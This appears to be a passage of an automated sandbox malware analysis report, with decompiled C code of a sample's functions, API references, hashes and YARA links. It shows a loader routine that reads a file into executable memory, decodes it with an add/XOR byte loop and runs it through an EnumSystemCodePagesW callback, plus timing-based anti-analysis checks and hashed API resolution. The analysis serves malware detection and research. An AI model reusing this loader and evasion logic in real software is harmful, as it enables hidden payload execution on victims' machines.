				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t55 = _t54 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t56 = _t55 + 8;
					do {
						E0041BE10( &_v284, 0x104);
						E0041C480( &_v284,  &_v804);
						_t57 = _t56 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
							_t57 = _t57 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe045
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_push( &_v840);
						asm("in al, dx");
						_push( &_v24);
						_t33 = E004080E0();
						_t56 = _t57 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                          0x00409abb
                          0x00409ac3
                          0x00409ac5
                          0x00409aca
                          0x00409acf
                          0x00409ae2
                          0x00409ae7
                          0x00409af0
                          0x00409afc
                          0x00409b0f
                          0x00409b14
                          0x00409b17
                          0x00409b20
                          0x00409b32
                          0x00409b37
                          0x00409b3c
                          0x00000000
                          0x00000000
                          0x00409b3e
                          0x00409b42
                          0x00000000
                          0x00000000
                          0x00409b44
                          0x00000000
                          0x00409b42
                          0x00409b46
                          0x00409b49
                          0x00409b4f
                          0x00409b51
                          0x00409b57
                          0x00409b5a
                          0x00409b5b
                          0x00409b5c
                          0x00409b61
                          0x00409b64
                          0x00409b71
                          0x00409b7c
                          0x00409b7e
                          0x00409b84
                          0x00409b88
                          0x00409b8b
                          0x00409b8b
                          0x00409b92
                          0x00409b95
                          0x00409b9a
                          0x00409ba7
                          0x00409ad6
                          0x00409ad6
                          0x00409ad6

                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                          • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                          • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                          • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                          C-Code - Quality: 100%
                          			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                          0x0041a647
                          0x0041a652
                          0x0041a65d
                          0x0041a661

                          APIs
                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID: 6EA
                          • API String ID: 1279760036-1400015478
                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                          • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 60threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 204 408308-40833d call 41be60 call 41ca00 210 408343-40835a call 414e50 204->210 211 40833e call 40acf0 204->211 214 40835c-40836e PostThreadMessageW 210->214 215 40838e-408392 210->215 211->210 216 408370-40838a call 40a480 214->216 217 40838d 214->217 216->217 217->215
                          C-Code - Quality: 74%
                          			E00408308(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t14;
				int _t15;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				void* _t38;

				_t38 = __eflags;
				asm("jecxz 0x57");
				_t31 = _t33;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t27 = _a4 + 0x1c;
				_t14 = E0040ACF0(__ebx, _a4 + 0x1c, _t38, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E50(_t27, _t14, 0, 0, 0xc4e7b6d6);
				_t28 = _t15;
				if(_t28 != 0) {
					_t23 = _a8;
					_t15 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t28(_t23, 0x8003, _t31 + (E0040A480(_t40, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}













                          0x00408308
                          0x0040830f
                          0x00408311
                          0x0040831f
                          0x00408323
                          0x0040832e
                          0x0040833a
                          0x0040833e
                          0x0040834e
                          0x00408353
                          0x0040835a
                          0x0040835d
                          0x0040836a
                          0x0040836c
                          0x0040836e
                          0x0040838b
                          0x0040838b
                          0x0040838d
                          0x00408392

                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: 48f1625f06128197ee9c05067f4d4ed4952174e824ffa7518e7d1792578f2363
                          • Instruction ID: 16977d34fbc6432dd6070d8409758cd82b2745fa24eefa0c30c7e2f41e684c27
                          • Opcode Fuzzy Hash: 48f1625f06128197ee9c05067f4d4ed4952174e824ffa7518e7d1792578f2363
                          • Instruction Fuzzy Hash: AD012B319803187BE710A6909C02FEE7A185B40F50F04012DFF04BA1C1E6A8690547EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 220 408310-40831f 221 408328-40833d call 41ca00 220->221 222 408323 call 41be60 220->222 225 408343-40835a call 414e50 221->225 226 40833e call 40acf0 221->226 222->221 229 40835c-40836e PostThreadMessageW 225->229 230 40838e-408392 225->230 226->225 231 408370-40838a call 40a480 229->231 232 40838d 229->232 231->232 232->230
                          C-Code - Quality: 82%
                          			E00408310(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E0040ACF0(__ebx, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E50(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                          0x00408310
                          0x0040831f
                          0x00408323
                          0x0040832e
                          0x0040833a
                          0x0040833e
                          0x0040834e
                          0x00408353
                          0x0040835a
                          0x0040835d
                          0x0040836a
                          0x0040836c
                          0x0040836e
                          0x0040838b
                          0x0040838b
                          0x00000000
                          0x0040838d
                          0x00408392

                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                          • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                          • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                          • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004082D8 Relevance: 1.6, APIs: 1, Instructions: 53threadwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 235 4082d8-4082de 236 4082e0-4082fd call 41b8a0 call 41b750 235->236 237 408332-40835a call 40acf0 call 414e50 235->237 246 40835c-40836e PostThreadMessageW 237->246 247 40838e-408392 237->247 249 408370-40838a call 40a480 246->249 250 40838d 246->250 249->250 250->247
                          APIs
                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: MessagePostThread
                          • String ID:
                          • API String ID: 1836367815-0
                          • Opcode ID: 513273eada03b9342c95d2e5e537be130e5ee20e96d952f5360e8c2cdb04192a
                          • Instruction ID: 0616b74cdbd2c06c8b2af6f14d0266791c6beb930aeb5af95f47da66d07b7cc3
                          • Opcode Fuzzy Hash: 513273eada03b9342c95d2e5e537be130e5ee20e96d952f5360e8c2cdb04192a
                          • Instruction Fuzzy Hash: 09012B316403197AE731A5752C03FEB36489B81F64F04016FFE48BA1C1EAA9690642EA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A663 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 277 41a663-41a687 call 41af60 279 41a68c-41a6a1 RtlFreeHeap 277->279
                          C-Code - Quality: 44%
                          			E0041A663(void* __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t13;
				void* _t19;

				asm("std");
				asm("lock add edx, 0x83ffff97");
				asm("fmulp st2, st0");
				asm("sti");
				_t10 = _a4;
				_t4 = _t10 + 0xc74; // 0xc74
				E0041AF60(_t19, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t13;
			}





                          0x0041a664
                          0x0041a665
                          0x0041a66c
                          0x0041a66e
                          0x0041a673
                          0x0041a67f
                          0x0041a687
                          0x0041a69d
                          0x0041a6a1

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: e5b13c149e32cf4a7695202f36eaf45453a730cb95af23a84897f7362efd058b
                          • Instruction ID: 665a1c9025c36f90054f32e33f51ba5fb1a3a56c356f4a9f817cd15bdf25c57f
                          • Opcode Fuzzy Hash: e5b13c149e32cf4a7695202f36eaf45453a730cb95af23a84897f7362efd058b
                          • Instruction Fuzzy Hash: 31E0D8B82442890BD714EF69DC9049B37D5EF80314710995EE85987757C234D96A46F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 280 41a670-41a686 281 41a68c-41a6a1 RtlFreeHeap 280->281 282 41a687 call 41af60 280->282 282->281
                          C-Code - Quality: 100%
                          			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                          0x0041a67f
                          0x0041a687
                          0x0041a69d
                          0x0041a6a1

                          APIs
                          • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                          • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 283 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                          C-Code - Quality: 100%
                          			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                          0x0041a7ea
                          0x0041a800
                          0x0041a804

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: LookupPrivilegeValue
                          • String ID:
                          • API String ID: 3899507212-0
                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                          • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                          0x0041a6b3
                          0x0041a6ca
                          0x0041a6d8

                          APIs
                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                          Memory Dump Source
                          • Source File: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_jsqqecy.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                          • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 00BCC520 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467registrystringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfW.USER32 ref: 00BCC5D3
                          • RegSetValueExW.ADVAPI32 ref: 00BCC61F
                          • RegSetValueExW.ADVAPI32 ref: 00BCC69D
                          • RegSetValueExW.ADVAPI32 ref: 00BCC702
                            • Part of subcall function 00BC33D0: GetDpiForSystem.USER32 ref: 00BC343C
                            • Part of subcall function 00BC33D0: MulDiv.KERNEL32 ref: 00BC3455
                            • Part of subcall function 00BC33D0: GetDpiForSystem.USER32 ref: 00BC3466
                            • Part of subcall function 00BC33D0: MulDiv.KERNEL32 ref: 00BC347F
                          • RegSetValueExW.ADVAPI32 ref: 00BCC76A
                          • lstrcmpW.KERNEL32 ref: 00BCC798
                          • lstrlenW.KERNEL32 ref: 00BCC7B5
                          • RegSetValueExW.ADVAPI32 ref: 00BCC7F7
                          • RegSetValueExW.ADVAPI32 ref: 00BCC85F
                          • GetDpiForSystem.USER32 ref: 00BCC896
                          • MulDiv.KERNEL32 ref: 00BCC8B1
                          • GetDpiForSystem.USER32 ref: 00BCC8C0
                          • MulDiv.KERNEL32 ref: 00BCC8DB
                          • RegSetValueExW.ADVAPI32 ref: 00BCC946
                          • RegSetValueExW.ADVAPI32 ref: 00BCC9AE
                          • RegSetValueExW.ADVAPI32 ref: 00BCCA10
                          • RegSetValueExW.ADVAPI32 ref: 00BCCA72
                          • RegSetValueExW.ADVAPI32 ref: 00BCCAD4
                          • RegSetValueExW.ADVAPI32 ref: 00BCCB36
                          • RegSetValueExW.ADVAPI32 ref: 00BCCB98
                          • RegSetValueExW.ADVAPI32 ref: 00BCCBFA
                          • RegSetValueExW.ADVAPI32 ref: 00BCCC87
                          • RegSetValueExW.ADVAPI32 ref: 00BCCCEC
                          • RegSetValueExW.ADVAPI32 ref: 00BCCD79
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.380905775.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000002.00000002.380898283.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380927290.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380938533.0000000000BE4000.00000008.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.380946091.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Value$System$lstrcmplstrlenwsprintf
                          • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
                          • API String ID: 4202061470-2238697219
                          • Opcode ID: 5ef803162438cc3a9b6ee79701e707150f1b15f8eb30428ebe135a66ed067f05
                          • Instruction ID: 8f3a93b2ce213617c036cd1155700675b23c3877cb9e2ca08b68e01d1ac16ef3
                          • Opcode Fuzzy Hash: 5ef803162438cc3a9b6ee79701e707150f1b15f8eb30428ebe135a66ed067f05
                          • Instruction Fuzzy Hash: CB32C2B0904249DFDB10DF58C484BAEBBF0FF48314F1189AEE9599B250D7749A88CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC18D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 466filememoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 17%
                          			E00BC18D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t287;
				signed int _t289;
				signed int _t292;
				void* _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t337;
				signed int _t343;
				signed int _t350;
				intOrPtr _t380;
				void* _t439;
				void* _t442;
				void* _t446;
				signed int* _t447;
				signed int* _t448;
				intOrPtr* _t449;
				signed int* _t450;
				intOrPtr* _t451;
				signed int* _t452;
				intOrPtr* _t454;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900;
				_v76 = E00BD1031();
				if(_v76 != 0) {
					E00BCFC90(_t439, _v76, 0x54, 0x3d0900);
					_v44 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0);
					_v48 = GetFileSize(_v44, 0);
					_v40 = VirtualAlloc(0, _v48, 0x3000, 0x40);
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0);
					_t446 = _t442 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xc8;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000b1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xf3;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000af;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000054;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xb9;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xf9;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x0000000a;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??);
					_t447 = _t446 - 8;
					 *_t447 = _v76;
					E00BD0FAD();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0xbe4918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t282 = GetOEMCP();
					 *0xbe49b8 = _t282;
					 *0xbe49b4 = _t282;
					 *0xbe49a4 = 0x32;
					_t283 =  *0xbe49a4; // 0x0
					 *_t447 = _t283;
					_v176 = 4;
					_t284 = E00BD0FA2();
					 *0xbe49a0 = _t284;
					__eflags = _t284;
					if(_t284 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t312 = E00BD1217();
							__eflags = _t312;
							if(_t312 != 0) {
								 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t315 = E00BD1217();
								__eflags = _t315;
								if(_t315 != 0) {
									 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t318 = E00BD1217();
									__eflags = _t318;
									if(_t318 != 0) {
										 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t321 = E00BD1217();
										__eflags = _t321;
										if(_t321 != 0) {
											 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t324 = E00BD1217();
											__eflags = _t324;
											if(_t324 != 0) {
												 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t327 = E00BD1217();
												__eflags = _t327;
												if(_t327 != 0) {
													_v16 = 1;
												} else {
													_t329 = _v68 + 1;
													_v68 = _t329;
													__eflags = _t329 - _v52;
													if(_t329 != _v52) {
														 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0xbe4914 = E00BD13A1();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t337 = _v68 + 1;
												_v68 = _t337;
												__eflags = _t337 - _v52;
												if(_t337 != _v52) {
													 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E00BD13A1();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t343 = _v68 + 1;
											_v68 = _t343;
											__eflags = _t343 - _v52;
											if(_t343 != _v52) {
												 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E00BD13A1();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0xbe4920;
													if( *0xbe4920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t350 = _v68 + 1;
										_v68 = _t350;
										__eflags = _t350 - _v52;
										if(_t350 != _v52) {
											 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E00BD13A1();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0xbe4920;
												if( *0xbe4920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0xbe4920 = 1;
									 *0xbe4924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
